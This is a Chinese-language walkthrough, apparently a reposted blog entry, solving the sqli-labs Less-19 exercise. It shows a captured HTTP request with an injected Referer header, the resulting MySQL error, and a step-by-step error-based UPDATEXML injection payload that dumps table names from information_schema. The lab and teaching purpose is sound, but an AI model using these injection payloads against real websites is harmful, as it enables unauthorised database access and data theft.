zoukankan html css js c++ java

Less19

Less-19

有了18题目的经验，这道题就比较简单
直接bp抓包发送

POST /Less-19/ HTTP/1.1
Host: sql.alienwares.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://sql.alienwares.top
Connection: close
Referer: asa'ddd#
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

View Code

You have an error in your SQL syntax;...version for the right syntax to use near 'ddd#', '117.188.186.53')' at line 1

返回mysql报错的结果
mysql 语句应该为

insert into table_name values ('a','b'）

View Code

开始sql注入语句构造

sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE() 
concat(0x7e,sELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())
#记得加（
select updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1)
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or 1=1,'127.0.0.1')#', '$IP')

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (''or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#', '$IP')
'or UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=DATABASE())),1),'127.0.0.1')#

View Code

sql注入大功告成

查看全文

相关阅读:
机器学习 -- 用户画像
 机器学习 -- 分类
 机器学习 -- 聚类
 机器学习 -- 回归
 数据分析 -- 流程
 Nginx + Tomcat7 + redis session一致性问题
 机器学习 -- 信息论
 机器学习 -- 统计与分布
 ElasticSearch 学习一：基本命令
 问题17：如何将多个小字符串拼接成一个大的字符串

原文地址：https://www.cnblogs.com/hackering/p/14273474.html